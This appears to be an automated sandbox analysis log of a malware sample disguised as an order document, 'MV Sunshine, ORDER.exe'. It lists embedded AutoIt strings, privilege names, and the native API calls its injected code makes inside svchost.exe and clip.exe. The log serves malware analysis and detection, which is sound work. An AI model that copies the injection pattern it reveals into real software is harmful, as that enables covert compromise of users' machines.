Source: MV Sunshine, ORDER.exe, 00000000.00000002.1691529951.0000000000A35000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_1aae5dbc-8
Source: MV Sunshine, ORDER.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_f977fb97-6
Source: MV Sunshine, ORDER.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_dd79ca38-5

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: MV Sunshine, ORDER.exe

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042AFF3 NtClose,	1_2_0042AFF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972B60 NtClose,LdrInitializeThunk,	1_2_03972B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03972DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972C70 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_03972C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039735C0 NtCreateMutant,LdrInitializeThunk,	1_2_039735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03974340 NtSetContextThread,	1_2_03974340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03974650 NtSuspendThread,	1_2_03974650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972B80 NtQueryInformationFile,	1_2_03972B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972BA0 NtEnumerateValueKey,	1_2_03972BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972BF0 NtAllocateVirtualMemory,	1_2_03972BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972BE0 NtQueryValueKey,	1_2_03972BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972AB0 NtWaitForSingleObject,	1_2_03972AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972AD0 NtReadFile,	1_2_03972AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972AF0 NtWriteFile,	1_2_03972AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972F90 NtProtectVirtualMemory,	1_2_03972F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972FB0 NtResumeThread,	1_2_03972FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972FA0 NtQuerySection,	1_2_03972FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972FE0 NtCreateFile,	1_2_03972FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972F30 NtCreateSection,	1_2_03972F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972F60 NtCreateProcessEx,	1_2_03972F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972E80 NtReadVirtualMemory,	1_2_03972E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972EA0 NtAdjustPrivilegesToken,	1_2_03972EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972EE0 NtQueueApcThread,	1_2_03972EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972E30 NtWriteVirtualMemory,	1_2_03972E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972DB0 NtEnumerateKey,	1_2_03972DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972DD0 NtDelayExecution,	1_2_03972DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972D10 NtMapViewOfSection,	1_2_03972D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972D00 NtSetInformationFile,	1_2_03972D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972D30 NtUnmapViewOfSection,	1_2_03972D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972CA0 NtQueryInformationToken,	1_2_03972CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972CC0 NtQueryVirtualMemory,	1_2_03972CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972CF0 NtOpenProcess,	1_2_03972CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972C00 NtQueryInformationProcess,	1_2_03972C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03972C60 NtCreateKey,	1_2_03972C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03973090 NtSetValueKey,	1_2_03973090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03973010 NtOpenDirectoryObject,	1_2_03973010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039739B0 NtGetContextThread,	1_2_039739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03973D10 NtOpenProcessToken,	1_2_03973D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03973D70 NtOpenThread,	1_2_03973D70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04844650 NtSuspendThread,LdrInitializeThunk,	3_2_04844650
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04844340 NtSetContextThread,LdrInitializeThunk,	3_2_04844340
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842CA0 NtQueryInformationToken,LdrInitializeThunk,	3_2_04842CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842C60 NtCreateKey,LdrInitializeThunk,	3_2_04842C60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842C70 NtFreeVirtualMemory,LdrInitializeThunk,	3_2_04842C70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842DD0 NtDelayExecution,LdrInitializeThunk,	3_2_04842DD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842DF0 NtQuerySystemInformation,LdrInitializeThunk,	3_2_04842DF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842D10 NtMapViewOfSection,LdrInitializeThunk,	3_2_04842D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842D30 NtUnmapViewOfSection,LdrInitializeThunk,	3_2_04842D30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842E80 NtReadVirtualMemory,LdrInitializeThunk,	3_2_04842E80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842EE0 NtQueueApcThread,LdrInitializeThunk,	3_2_04842EE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842FB0 NtResumeThread,LdrInitializeThunk,	3_2_04842FB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842FE0 NtCreateFile,LdrInitializeThunk,	3_2_04842FE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842F30 NtCreateSection,LdrInitializeThunk,	3_2_04842F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842AD0 NtReadFile,LdrInitializeThunk,	3_2_04842AD0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842AF0 NtWriteFile,LdrInitializeThunk,	3_2_04842AF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842BA0 NtEnumerateValueKey,LdrInitializeThunk,	3_2_04842BA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842BE0 NtQueryValueKey,LdrInitializeThunk,	3_2_04842BE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	3_2_04842BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842B60 NtClose,LdrInitializeThunk,	3_2_04842B60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048435C0 NtCreateMutant,LdrInitializeThunk,	3_2_048435C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048439B0 NtGetContextThread,LdrInitializeThunk,	3_2_048439B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842CC0 NtQueryVirtualMemory,	3_2_04842CC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842CF0 NtOpenProcess,	3_2_04842CF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842C00 NtQueryInformationProcess,	3_2_04842C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842DB0 NtEnumerateKey,	3_2_04842DB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842D00 NtSetInformationFile,	3_2_04842D00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842EA0 NtAdjustPrivilegesToken,	3_2_04842EA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842E30 NtWriteVirtualMemory,	3_2_04842E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842F90 NtProtectVirtualMemory,	3_2_04842F90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842FA0 NtQuerySection,	3_2_04842FA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842F60 NtCreateProcessEx,	3_2_04842F60
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842AB0 NtWaitForSingleObject,	3_2_04842AB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04842B80 NtQueryInformationFile,	3_2_04842B80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04843090 NtSetValueKey,	3_2_04843090
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04843010 NtOpenDirectoryObject,	3_2_04843010
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04843D10 NtOpenProcessToken,	3_2_04843D10
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04843D70 NtOpenThread,	3_2_04843D70
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028D7B40 NtCreateFile,	3_2_028D7B40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028D7E30 NtClose,	3_2_028D7E30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028D7F90 NtAllocateVirtualMemory,	3_2_028D7F90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028D7CA0 NtReadFile,	3_2_028D7CA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_028D7D90 NtDeleteFile,	3_2_028D7D90

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009E40B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,

0_2_009E40B1

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009D8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_009D8858

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe

Code function: 0_2_009E545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_009E545F

Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_0098E800	0_2_0098E800
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009ADBB5	0_2_009ADBB5
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00A0804A	0_2_00A0804A
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_0098E060	0_2_0098E060
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00994140	0_2_00994140
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A2405	0_2_009A2405
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B6522	0_2_009B6522
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00A00665	0_2_00A00665
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B267E	0_2_009B267E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A283A	0_2_009A283A
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00996843	0_2_00996843
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B89DF	0_2_009B89DF
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B6A94	0_2_009B6A94
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00A00AE2	0_2_00A00AE2
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00998A0E	0_2_00998A0E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009E8B13	0_2_009E8B13
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009DEB07	0_2_009DEB07
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009ACD61	0_2_009ACD61
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B7006	0_2_009B7006
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00993190	0_2_00993190
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_0099710E	0_2_0099710E
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00981287	0_2_00981287
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A33C7	0_2_009A33C7
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009AF419	0_2_009AF419
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_00995680	0_2_00995680
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A16C4	0_2_009A16C4
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A78D3	0_2_009A78D3
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009958C0	0_2_009958C0
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A1BB8	0_2_009A1BB8
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009B9D05	0_2_009B9D05
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_0098FE40	0_2_0098FE40
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009A1FD0	0_2_009A1FD0
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_009ABFE6	0_2_009ABFE6
Source: C:\Users\user\Desktop\MV Sunshine, ORDER.exe	Code function: 0_2_02223630	0_2_02223630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004011C0	1_2_004011C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021A5	1_2_004021A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004021B0	1_2_004021B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FACB	1_2_0040FACB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FAD3	1_2_0040FAD3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402320	1_2_00402320
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004023BC	1_2_004023BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042D443	1_2_0042D443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00416433	1_2_00416433
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040FCF3	1_2_0040FCF3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0040DD73	1_2_0040DD73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402F50	1_2_00402F50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A003E6	1_2_03A003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394E3F0	1_2_0394E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FA352	1_2_039FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C02C0	1_2_039C02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0274	1_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A001AA	1_2_03A001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F81CC	1_2_039F81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DA118	1_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930100	1_2_03930100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039C8158	1_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393C7C0	1_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03964750	1_2_03964750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940770	1_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395C6E0	1_2_0395C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A00591	1_2_03A00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940535	1_2_03940535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EE4F6	1_2_039EE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2446	1_2_039F2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F6BD7	1_2_039F6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FAB40	1_2_039FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393EA80	1_2_0393EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0A9A6	1_2_03A0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039429A0	1_2_039429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03956962	1_2_03956962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039268B8	1_2_039268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396E8F0	1_2_0396E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394A840	1_2_0394A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03942840	1_2_03942840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039BEFA0	1_2_039BEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03932FC8	1_2_03932FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03960F30	1_2_03960F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03982F28	1_2_03982F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B4F40	1_2_039B4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03952E90	1_2_03952E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FCE93	1_2_039FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FEEDB	1_2_039FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FEE26	1_2_039FEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940E59	1_2_03940E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03958DBF	1_2_03958DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393ADE0	1_2_0393ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AD00	1_2_0394AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E0CB5	1_2_039E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03930CF2	1_2_03930CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03940C00	1_2_03940C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0398739A	1_2_0398739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F132D	1_2_039F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392D34C	1_2_0392D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039452A0	1_2_039452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395B2C0	1_2_0395B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395D2F0	1_2_0395D2F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E12ED	1_2_039E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394B1B0	1_2_0394B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03A0B16B	1_2_03A0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392F172	1_2_0392F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397516C	1_2_0397516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EF0CC	1_2_039EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039470C0	1_2_039470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F70E9	1_2_039F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FF0E0	1_2_039FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FF7B0	1_2_039FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F16CC	1_2_039F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DD5B0	1_2_039DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F7571	1_2_039F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FF43F	1_2_039FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03931460	1_2_03931460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FB80	1_2_0395FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B5BF0	1_2_039B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0397DBF9	1_2_0397DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FFB76	1_2_039FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DDAAC	1_2_039DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03985AA0	1_2_03985AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EDAC6	1_2_039EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FFA49	1_2_039FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F7A46	1_2_039F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B3A6C	1_2_039B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03949950	1_2_03949950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395B950	1_2_0395B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039438E0	1_2_039438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039AD800	1_2_039AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03941F92	1_2_03941F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FFFB1	1_2_039FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FFF09	1_2_039FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03949EB0	1_2_03949EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395FDC0	1_2_0395FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1D5A	1_2_039F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03943D40	1_2_03943D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F7D73	1_2_039F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FFCF2	1_2_039FFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039B9C32	1_2_039B9C32
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D58050	2_2_02D58050
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D59FD0	2_2_02D59FD0
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D60710	2_2_02D60710
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D77720	2_2_02D77720
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D59DB0	2_2_02D59DB0
Source: C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe	Code function: 2_2_02D59DA8	2_2_02D59DA8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048BE4F6	3_2_048BE4F6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B4420	3_2_048B4420
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C2446	3_2_048C2446
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048D0591	3_2_048D0591
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04810535	3_2_04810535
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0482C6E0	3_2_0482C6E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0480C7C0	3_2_0480C7C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04834750	3_2_04834750
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04810770	3_2_04810770
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048A2000	3_2_048A2000
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048D01AA	3_2_048D01AA
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C41A2	3_2_048C41A2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048C81CC	3_2_048C81CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04800100	3_2_04800100
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048AA118	3_2_048AA118
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04898158	3_2_04898158
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048902C0	3_2_048902C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B0274	3_2_048B0274
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048D03E6	3_2_048D03E6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0481E3F0	3_2_0481E3F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048CA352	3_2_048CA352
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_048B0CB5	3_2_048B0CB5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04800CF2	3_2_04800CF2
